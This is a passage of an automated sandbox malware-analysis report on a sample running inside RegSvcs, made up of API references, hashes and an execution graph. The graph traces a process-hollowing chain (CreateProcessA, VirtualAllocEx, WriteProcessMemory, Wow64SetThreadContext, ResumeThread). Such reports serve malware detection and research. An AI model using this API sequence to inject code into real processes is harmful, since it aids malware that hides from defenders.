                                                  • Opcode Fuzzy Hash: cb12571f44bba02b7d1aaff92e5089bca52e65348185cd7b0bc2308b0398a123
                                                  • Instruction Fuzzy Hash: 89413772D083A68FCB14CF69D8442AEBBF5BFC9610F14856BD504E7241EB74A841CBE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1214 652d0a4-652d116 1216 652d121-652d128 1214->1216 1217 652d118-652d11e 1214->1217 1218 652d133-652d16b 1216->1218 1219 652d12a-652d130 1216->1219 1217->1216 1220 652d173-652d1d2 CreateWindowExW 1218->1220 1219->1218 1221 652d1d4-652d1da 1220->1221 1222 652d1db-652d213 1220->1222 1221->1222 1226 652d220 1222->1226 1227 652d215-652d218 1222->1227 1228 652d221 1226->1228 1227->1226 1228->1228
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0652D1C2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: e086aa6ffd6c4cbcb3744225259bd9daa7b800303eae6af303037639a1f789bf
                                                  • Instruction ID: a0d0c7f22651bbd005ca87a9f306b0dd192c49cf50e5529dc8f9796b60b35840
                                                  • Opcode Fuzzy Hash: e086aa6ffd6c4cbcb3744225259bd9daa7b800303eae6af303037639a1f789bf
                                                  • Instruction Fuzzy Hash: 2D51CFB1D003599FDB14CF99D884ADEBFB5BF49310F24822AE819AB250D775A885CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1229 652d0b0-652d116 1230 652d121-652d128 1229->1230 1231 652d118-652d11e 1229->1231 1232 652d133-652d16b 1230->1232 1233 652d12a-652d130 1230->1233 1231->1230 1234 652d173-652d1d2 CreateWindowExW 1232->1234 1233->1232 1235 652d1d4-652d1da 1234->1235 1236 652d1db-652d213 1234->1236 1235->1236 1240 652d220 1236->1240 1241 652d215-652d218 1236->1241 1242 652d221 1240->1242 1241->1240 1242->1242
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0652D1C2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: b66c46b84f574a690c35befda199c7df6b0f20c1656456865ce66192e66fa98c
                                                  • Instruction ID: 99435770012e16365e99e8fb752a63a3e0c7349e942a212fe3968fc15e5f6e2c
                                                  • Opcode Fuzzy Hash: b66c46b84f574a690c35befda199c7df6b0f20c1656456865ce66192e66fa98c
                                                  • Instruction Fuzzy Hash: 0241C0B1D003599FDB14CF99D884ADEBBB5BF49310F24822AE819AB250D771A885CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1243 652a32c-652f82c 1246 652f832-652f837 1243->1246 1247 652f8dc-652f8fc call 652a264 1243->1247 1249 652f88a-652f8c2 CallWindowProcW 1246->1249 1250 652f839-652f870 1246->1250 1254 652f8ff-652f90c 1247->1254 1251 652f8c4-652f8ca 1249->1251 1252 652f8cb-652f8da 1249->1252 1257 652f872-652f878 1250->1257 1258 652f879-652f888 1250->1258 1251->1252 1252->1254 1257->1258 1258->1254
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0652F8B1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: e83b44142530b4e293a631f7bbc65b0b6bd91a06f2bb9576d80e2875e59da9bd
                                                  • Instruction ID: 2b6d5b8ed4d1b67a335b8ea884bd11650e02dd2c9af7c1d8ea08c66a552eec43
                                                  • Opcode Fuzzy Hash: e83b44142530b4e293a631f7bbc65b0b6bd91a06f2bb9576d80e2875e59da9bd
                                                  • Instruction Fuzzy Hash: F8416AB490031ADFDB44CF9AC448AAAFBF5FF89314F248458D519AB361C774A841CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1260 6522bf8-6522bff 1261 6522c00-6522c94 DuplicateHandle 1260->1261 1262 6522c96-6522c9c 1261->1262 1263 6522c9d-6522cba 1261->1263 1262->1263
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06522C87
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 87be99a159c43231e94be8b4dbe00db9e3a79fcc9bf9da3d7db5c5fa84a47103
                                                  • Instruction ID: d572077c94863c3a06551627361a665d7706aa37724596eb6dfec30bb4985b68
                                                  • Opcode Fuzzy Hash: 87be99a159c43231e94be8b4dbe00db9e3a79fcc9bf9da3d7db5c5fa84a47103
                                                  • Instruction Fuzzy Hash: 2C21D4B5D00259AFDB10CFAAD984AEEBBF9FB48310F14801AE914A3350D374A950CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1266 6522c00-6522c94 DuplicateHandle 1267 6522c96-6522c9c 1266->1267 1268 6522c9d-6522cba 1266->1268 1267->1268
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06522C87
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 297a6c49a41f683266afcf910b5f88daa3e5154c8dff0da61633b12c14eaa584
                                                  • Instruction ID: d8de1b644661d7b319d848016428079bc2a64865004ff2492de4c3adc5019ffc
                                                  • Opcode Fuzzy Hash: 297a6c49a41f683266afcf910b5f88daa3e5154c8dff0da61633b12c14eaa584
                                                  • Instruction Fuzzy Hash: E121E4B5900259EFDB10CF9AD984ADEBBF4FB48320F14801AE918B3350D374A950CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1271 1317348-131739a 1274 13173a2-13173cd DeleteFileW 1271->1274 1275 131739c-131739f 1271->1275 1276 13173d6-13173fe 1274->1276 1277 13173cf-13173d5 1274->1277 1275->1274 1277->1276
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(00000000), ref: 013173C0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2412270078.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1310000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: a8f66b4ce3f57af94761f8464ce44696a0929a07e92122a14e956a8207820d65
                                                  • Instruction ID: 5164a15245b6881dc8470fef069a50126fb943f91290cfe263338a89792574ca
                                                  • Opcode Fuzzy Hash: a8f66b4ce3f57af94761f8464ce44696a0929a07e92122a14e956a8207820d65
                                                  • Instruction Fuzzy Hash: 2A2156B2C0065A9FCB14CF9AD445BEEFBB4FF48320F14852AD918A7240D778A940CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1280 1317350-131739a 1282 13173a2-13173cd DeleteFileW 1280->1282 1283 131739c-131739f 1280->1283 1284 13173d6-13173fe 1282->1284 1285 13173cf-13173d5 1282->1285 1283->1282 1285->1284
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(00000000), ref: 013173C0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2412270078.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1310000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 51587313e15f17233ed302a2fe810a29d12856b84f6f2e907e6e52fbdea657c2
                                                  • Instruction ID: c002734248bccf3fac70b3b1efc8a06c17b1de35973888320a28c7871d754153
                                                  • Opcode Fuzzy Hash: 51587313e15f17233ed302a2fe810a29d12856b84f6f2e907e6e52fbdea657c2
                                                  • Instruction Fuzzy Hash: E21156B1C0061A8BCB14CF9AC445B9EFBB4BF48320F14852AD918A3240D378A900CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1288 652a0c8-652b360 1290 652b362-652b365 1288->1290 1291 652b368-652b397 LoadLibraryExW 1288->1291 1290->1291 1292 652b3a0-652b3bd 1291->1292 1293 652b399-652b39f 1291->1293 1293->1292
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0652B199,00000800,00000000,00000000), ref: 0652B38A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 7bece3e50def91375cc31f6bf32b2d4fbb221c8e7440cb0071f32535c6f75b4c
                                                  • Instruction ID: d9065d43b6d70e0d80d8ee2c91f9e7e51b014c3b934431faa3cb09eb27cb3107
                                                  • Opcode Fuzzy Hash: 7bece3e50def91375cc31f6bf32b2d4fbb221c8e7440cb0071f32535c6f75b4c
                                                  • Instruction Fuzzy Hash: F81114B6C003198FDB10CF9AD844B9EFBF4FB49314F10842AE519A7240C375A544CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1296 652b31a-652b360 1298 652b362-652b365 1296->1298 1299 652b368-652b397 LoadLibraryExW 1296->1299 1298->1299 1300 652b3a0-652b3bd 1299->1300 1301 652b399-652b39f 1299->1301 1301->1300
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0652B199,00000800,00000000,00000000), ref: 0652B38A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 6a93b39b04540104142ac915fae5f4f288aaea67f974459d17d6cb91e8d288eb
                                                  • Instruction ID: 268b5489da7f313ddf7bb9980a31a45371065d923ad77bf67abe32494c00e53f
                                                  • Opcode Fuzzy Hash: 6a93b39b04540104142ac915fae5f4f288aaea67f974459d17d6cb91e8d288eb
                                                  • Instruction Fuzzy Hash: 5E1123B6C003099FDB10CFAAD844ADEFBF8FB98724F10842AE519A7240C375A545CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0653E692), ref: 0653E77F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421323475.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6530000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 0a6d7ddc4c198bb7c7189c16536e2e6e5614ab987b8afac8f6fa1dfa5571ad95
                                                  • Instruction ID: 210b71aa810e5fb6f77e4e00b5200dd3ce05b4aa9c029b5cb5c9a54e83a1af40
                                                  • Opcode Fuzzy Hash: 0a6d7ddc4c198bb7c7189c16536e2e6e5614ab987b8afac8f6fa1dfa5571ad95
                                                  • Instruction Fuzzy Hash: 971106B1C006699BDB10CF9AC84579EFBF4BF48620F14816AE918A7241D378A950CFE5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0653E692), ref: 0653E77F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421323475.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6530000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 00cc93f0d8dc2106b4d9406ba04431e7782704ca545c077929cd7146165d7bc1
                                                  • Instruction ID: 7fd3506d0fe6a66e490943075ac8d297f61d3af9323987e10c74fe192c1297c8
                                                  • Opcode Fuzzy Hash: 00cc93f0d8dc2106b4d9406ba04431e7782704ca545c077929cd7146165d7bc1
                                                  • Instruction Fuzzy Hash: EE1133B1C0066A8FCB10CF9AC44479EFBF4BF48320F14816AE818A7240D378A910CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0652B11E
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2421257339.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6520000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 1bd53ded3f3221fb47d49e41d2479bd19fa0ac9e15d2568d2eaf14eaa2756542
                                                  • Instruction ID: c9fd0e988f3e0245f0092263eed222a3a14d56494d30f96e6184c8ba3ac20487
                                                  • Opcode Fuzzy Hash: 1bd53ded3f3221fb47d49e41d2479bd19fa0ac9e15d2568d2eaf14eaa2756542
                                                  • Instruction Fuzzy Hash: C8110FB6C0025A8FCB10CF9AD844A9EFBF4BB88224F10841AD828A7240D379A545CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2410473666.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_12bd000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0456dfa74ad0b3fc1f4653b0ac6c6f92daaa03927114b4808930f00eb7fca94b
                                                  • Instruction ID: e9d129aa6d9049754263bdfbc7b7144ebc2d18ea42f7b5c0a944afd08fe79236
                                                  • Opcode Fuzzy Hash: 0456dfa74ad0b3fc1f4653b0ac6c6f92daaa03927114b4808930f00eb7fca94b
                                                  • Instruction Fuzzy Hash: FE212575514208DFDB15DF54D5C0BA6BF61FB84398F24C96DDA0A0B252C37AD407CA61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2410473666.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_12bd000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 95720e7f6eb0dd15adb1d057807895d52c5e1fc28633b34c0f5cccd6ff5a3504
                                                  • Instruction ID: 1b5869b288da62a887a8dcbf49ad6aab6f7030d66946add05e22b8a11b077e8a
                                                  • Opcode Fuzzy Hash: 95720e7f6eb0dd15adb1d057807895d52c5e1fc28633b34c0f5cccd6ff5a3504
                                                  • Instruction Fuzzy Hash: 5E217F755083849FCB02CF64D994B51BF71EB46318F28C5DAD9498B2A7C33A981ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:11.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:496
                                                  Total number of Limit Nodes:21
                                                  execution_graph 63009 25cf358 63010 25cf37b 63009->63010 63011 25cf398 63010->63011 63015 4d388e1 63010->63015 63020 4d38908 63010->63020 63024 4d388f9 63010->63024 63016 4d388f3 63015->63016 63017 4d3895d 63015->63017 63016->63011 63028 4d31894 63017->63028 63021 4d38930 63020->63021 63022 4d31894 DrawTextExW 63021->63022 63023 4d3899a 63022->63023 63025 4d38930 63024->63025 63026 4d31894 DrawTextExW 63025->63026 63027 4d3899a 63026->63027 63029 4d3189f 63028->63029 63031 4d344b2 63029->63031 63032 4d318b4 63029->63032 63033 4d318bf 63032->63033 63037 4d3515a 63033->63037 63041 4d35168 63033->63041 63034 4d3514f 63034->63031 63038 4d35171 63037->63038 63045 4d351a6 63038->63045 63039 4d35196 63039->63034 63042 4d35171 63041->63042 63044 4d351a6 DrawTextExW 63042->63044 63043 4d35196 63043->63034 63044->63043 63046 4d35139 63045->63046 63049 4d351aa 63045->63049 63047 4d3514f 63046->63047 63050 4d3515a DrawTextExW 63046->63050 63051 4d35168 DrawTextExW 63046->63051 63047->63039 63048 4d351da 63048->63039 63049->63048 63054 4d358d0 63049->63054 63059 4d358e0 63049->63059 63050->63047 63051->63047 63055 4d35908 63054->63055 63056 4d35a0e 63055->63056 63064 4d38af8 63055->63064 63069 4d38b08 63055->63069 63056->63048 63060 4d35908 63059->63060 63061 4d35a0e 63060->63061 63062 4d38af8 DrawTextExW 63060->63062 63063 4d38b08 DrawTextExW 63060->63063 63061->63048 63062->63061 63063->63061 63065 4d38b1e 63064->63065 63074 4d38f70 63065->63074 63078 4d38f60 63065->63078 63066 4d38b94 63066->63056 63070 4d38b1e 63069->63070 63072 4d38f70 DrawTextExW 63070->63072 63073 4d38f60 DrawTextExW 63070->63073 63071 4d38b94 63071->63056 63072->63071 63073->63071 63083 4d38fa1 63074->63083 63088 4d38fb0 63074->63088 63075 4d38f8e 63075->63066 63079 4d38f70 63078->63079 63081 4d38fa1 DrawTextExW 63079->63081 63082 4d38fb0 DrawTextExW 63079->63082 63080 4d38f8e 63080->63066 63081->63080 63082->63080 63084 4d38fe1 63083->63084 63085 4d3900e 63084->63085 63093 4d39030 63084->63093 63098 4d39020 63084->63098 63085->63075 63089 4d38fe1 63088->63089 63090 4d3900e 63089->63090 63091 4d39030 DrawTextExW 63089->63091 63092 4d39020 DrawTextExW 63089->63092 63090->63075 63091->63090 63092->63090 63095 4d39051 63093->63095 63094 4d39066 63094->63085 63095->63094 63096 4d380d8 DrawTextExW 63095->63096 63097 4d390c1 63096->63097 63100 4d39030 63098->63100 63099 4d39066 63099->63085 63100->63099 63101 4d380d8 DrawTextExW 63100->63101 63102 4d390c1 63101->63102 63337 88d01c 63338 88d034 63337->63338 63339 88d08e 63338->63339 63340 25c1c9c CallWindowProcW 63338->63340 63344 25c3728 63338->63344 63348 25c29b7 63338->63348 63352 25c29c8 63338->63352 63340->63339 63346 25c3765 63344->63346 63347 25c3789 63346->63347 63356 25c1dc4 CallWindowProcW 63346->63356 63347->63347 63349 25c29ee 63348->63349 63350 25c1c9c CallWindowProcW 63349->63350 63351 25c2a0f 63350->63351 63351->63339 63353 25c29ee 63352->63353 63354 25c1c9c CallWindowProcW 63353->63354 63355 25c2a0f 63354->63355 63355->63339 63356->63347 63103 afe1a8 DuplicateHandle 63104 afe23e 63103->63104 63357 af4668 63358 af467a 63357->63358 63359 af4686 63358->63359 63361 af4779 63358->63361 63362 af479d 63361->63362 63366 af4888 63362->63366 63370 af4877 63362->63370 63368 af48af 63366->63368 63367 af498c 63367->63367 63368->63367 63374 af4538 63368->63374 63371 af4887 63370->63371 63372 af4538 CreateActCtxA 63371->63372 63373 af498c 63371->63373 63372->63373 63375 af5d18 CreateActCtxA 63374->63375 63377 af5ddb 63375->63377 63377->63377 63392 2601808 63393 2601847 63392->63393 63394 2601f58 63393->63394 63395 2609bd8 GetCurrentThreadId 63393->63395 63396 2609bc9 GetCurrentThreadId 63393->63396 63395->63394 63396->63394 63397 84b6932 63398 84b65b4 63397->63398 63399 84b693c 63397->63399 63400 84b67ea 63398->63400 63404 84b8d58 63398->63404 63419 84b8dc6 63398->63419 63435 84b8d60 63398->63435 63405 84b8d5d 63404->63405 63450 84b947b 63405->63450 63455 84b910b 63405->63455 63461 84b9a14 63405->63461 63465 84b9884 63405->63465 63470 84b9937 63405->63470 63474 84b9217 63405->63474 63480 84b9310 63405->63480 63485 84b9a61 63405->63485 63489 84b9192 63405->63489 63494 84b96f3 63405->63494 63499 84b9558 63405->63499 63507 84b971a 63405->63507 63406 84b8d82 63406->63400 63420 84b8d54 63419->63420 63422 84b8dc9 63419->63422 63423 84b910b 2 API calls 63420->63423 63424 84b947b 2 API calls 63420->63424 63425 84b971a 2 API calls 63420->63425 63426 84b9558 4 API calls 63420->63426 63427 84b96f3 2 API calls 63420->63427 63428 84b9192 2 API calls 63420->63428 63429 84b9a61 2 API calls 63420->63429 63430 84b9310 2 API calls 63420->63430 63431 84b9217 2 API calls 63420->63431 63432 84b9937 2 API calls 63420->63432 63433 84b9884 2 API calls 63420->63433 63434 84b9a14 2 API calls 63420->63434 63421 84b8d82 63421->63400 63423->63421 63424->63421 63425->63421 63426->63421 63427->63421 63428->63421 63429->63421 63430->63421 63431->63421 63432->63421 63433->63421 63434->63421 63436 84b8d7a 63435->63436 63438 84b910b 2 API calls 63436->63438 63439 84b947b 2 API calls 63436->63439 63440 84b971a 2 API calls 63436->63440 63441 84b9558 4 API calls 63436->63441 63442 84b96f3 2 API calls 63436->63442 63443 84b9192 2 API calls 63436->63443 63444 84b9a61 2 API calls 63436->63444 63445 84b9310 2 API calls 63436->63445 63446 84b9217 2 API calls 63436->63446 63447 84b9937 2 API calls 63436->63447 63448 84b9884 2 API calls 63436->63448 63449 84b9a14 2 API calls 63436->63449 63437 84b8d82 63437->63400 63438->63437 63439->63437 63440->63437 63441->63437 63442->63437 63443->63437 63444->63437 63445->63437 63446->63437 63447->63437 63448->63437 63449->63437 63451 84b99ab 63450->63451 63512 84b5918 63451->63512 63516 84b5915 63451->63516 63452 84b92f8 63456 84b9118 63455->63456 63457 84b9182 63455->63457 63456->63406 63520 84b6138 63457->63520 63524 84b612c 63457->63524 63528 84b5aa8 63461->63528 63532 84b5ab0 63461->63532 63462 84b9a13 63462->63461 63536 84b5b9d 63465->63536 63540 84b5ba0 63465->63540 63466 84b95b3 63466->63465 63467 84b9aa6 63466->63467 63467->63406 63472 84b5918 Wow64SetThreadContext 63470->63472 63473 84b5915 Wow64SetThreadContext 63470->63473 63471 84b987b 63471->63470 63472->63471 63473->63471 63476 84b9184 63474->63476 63475 84b9249 63475->63406 63476->63475 63478 84b6138 CreateProcessA 63476->63478 63479 84b612c CreateProcessA 63476->63479 63477 84b92cd 63477->63406 63478->63477 63479->63477 63481 84b931d 63480->63481 63544 84b5868 63481->63544 63548 84b5865 63481->63548 63482 84b94b5 63486 84b9a13 63485->63486 63486->63485 63487 84b5aa8 WriteProcessMemory 63486->63487 63488 84b5ab0 WriteProcessMemory 63486->63488 63487->63486 63488->63486 63490 84b9184 63489->63490 63492 84b6138 CreateProcessA 63490->63492 63493 84b612c CreateProcessA 63490->63493 63491 84b92cd 63491->63406 63492->63491 63493->63491 63495 84b96fc 63494->63495 63497 84b5aa8 WriteProcessMemory 63495->63497 63498 84b5ab0 WriteProcessMemory 63495->63498 63496 84b9c07 63497->63496 63498->63496 63500 84b955e 63499->63500 63552 84b9e90 63500->63552 63557 84b9e80 63500->63557 63501 84b9b3c 63501->63406 63502 84b96de 63502->63501 63505 84b5aa8 WriteProcessMemory 63502->63505 63506 84b5ab0 WriteProcessMemory 63502->63506 63505->63502 63506->63502 63508 84b9720 63507->63508 63509 84b9b3c 63508->63509 63510 84b5aa8 WriteProcessMemory 63508->63510 63511 84b5ab0 WriteProcessMemory 63508->63511 63509->63406 63510->63508 63511->63508 63513 84b595d Wow64SetThreadContext 63512->63513 63515 84b59a5 63513->63515 63515->63452 63517 84b595d Wow64SetThreadContext 63516->63517 63519 84b59a5 63517->63519 63519->63452 63521 84b61c1 63520->63521 63521->63521 63522 84b6326 CreateProcessA 63521->63522 63523 84b6383 63522->63523 63525 84b61c1 63524->63525 63525->63525 63526 84b6326 CreateProcessA 63525->63526 63527 84b6383 63526->63527 63529 84b5af8 WriteProcessMemory 63528->63529 63531 84b5b4f 63529->63531 63531->63462 63533 84b5af8 WriteProcessMemory 63532->63533 63535 84b5b4f 63533->63535 63535->63462 63537 84b5beb ReadProcessMemory 63536->63537 63539 84b5c2f 63537->63539 63539->63466 63541 84b5beb ReadProcessMemory 63540->63541 63543 84b5c2f 63541->63543 63543->63466 63545 84b58a8 ResumeThread 63544->63545 63547 84b58d9 63545->63547 63547->63482 63549 84b58a8 ResumeThread 63548->63549 63551 84b58d9 63549->63551 63551->63482 63553 84b9ea5 63552->63553 63562 84b59e8 63553->63562 63566 84b59f0 63553->63566 63554 84b9ec4 63554->63502 63558 84b9ea5 63557->63558 63560 84b59e8 VirtualAllocEx 63558->63560 63561 84b59f0 VirtualAllocEx 63558->63561 63559 84b9ec4 63559->63502 63560->63559 63561->63559 63563 84b5a30 VirtualAllocEx 63562->63563 63565 84b5a6d 63563->63565 63565->63554 63567 84b5a30 VirtualAllocEx 63566->63567 63569 84b5a6d 63567->63569 63569->63554 63570 84b9fb0 63571 84b9fd6 63570->63571 63572 84ba13b 63570->63572 63571->63572 63574 84b5e54 63571->63574 63575 84ba230 PostMessageW 63574->63575 63576 84ba29c 63575->63576 63576->63571 63105 25c98d0 63106 25c98fd 63105->63106 63107 25c99f6 63106->63107 63108 25c9a94 63107->63108 63109 25c9b2a 63108->63109 63110 25c9c09 63109->63110 63111 25c9ca2 63110->63111 63112 25c9d21 63111->63112 63113 25c9dec 63112->63113 63221 4d30e4a 63113->63221 63227 4d30e58 63113->63227 63114 25ca4d3 63233 25c951c 63114->63233 63116 25ca62c 63218 4d32f30 GetCurrentThreadId 63116->63218 63219 4d32fd7 GetCurrentThreadId 63116->63219 63220 4d32f1f GetCurrentThreadId 63116->63220 63117 25ca6c3 63118 25c951c GetWindowWord 63117->63118 63119 25ca8bb 63118->63119 63120 25c951c GetWindowWord 63119->63120 63121 25ca9d7 63120->63121 63122 25c951c GetWindowWord 63121->63122 63123 25cab43 63122->63123 63124 25c951c GetWindowWord 63123->63124 63125 25cae1e 63124->63125 63126 25c951c GetWindowWord 63125->63126 63127 25caf27 63126->63127 63128 25c951c GetWindowWord 63127->63128 63129 25cb066 63128->63129 63130 25c951c GetWindowWord 63129->63130 63131 25cb1a5 63130->63131 63132 25c951c GetWindowWord 63131->63132 63133 25cb2e1 63132->63133 63134 25c951c GetWindowWord 63133->63134 63135 25cb41d 63134->63135 63216 4d34990 DrawTextExW 63135->63216 63217 4d349a0 DrawTextExW 63135->63217 63136 25cb4b6 63137 25c951c GetWindowWord 63136->63137 63138 25cb576 63137->63138 63139 25c951c GetWindowWord 63138->63139 63140 25cb669 63139->63140 63212 2609bd8 GetCurrentThreadId 63140->63212 63213 2609bc9 GetCurrentThreadId 63140->63213 63141 25cb76a 63142 25c951c GetWindowWord 63141->63142 63143 25cb840 63142->63143 63144 25c951c GetWindowWord 63143->63144 63145 25cb949 63144->63145 63146 25c951c GetWindowWord 63145->63146 63147 25cbb4f 63146->63147 63148 25c951c GetWindowWord 63147->63148 63149 25cbd48 63148->63149 63150 25c951c GetWindowWord 63149->63150 63151 25cbe4e 63150->63151 63152 25c951c GetWindowWord 63151->63152 63153 25cc054 63152->63153 63154 25c951c GetWindowWord 63153->63154 63155 25cc2d3 63154->63155 63156 25c951c GetWindowWord 63155->63156 63157 25cc3dc 63156->63157 63158 25c951c GetWindowWord 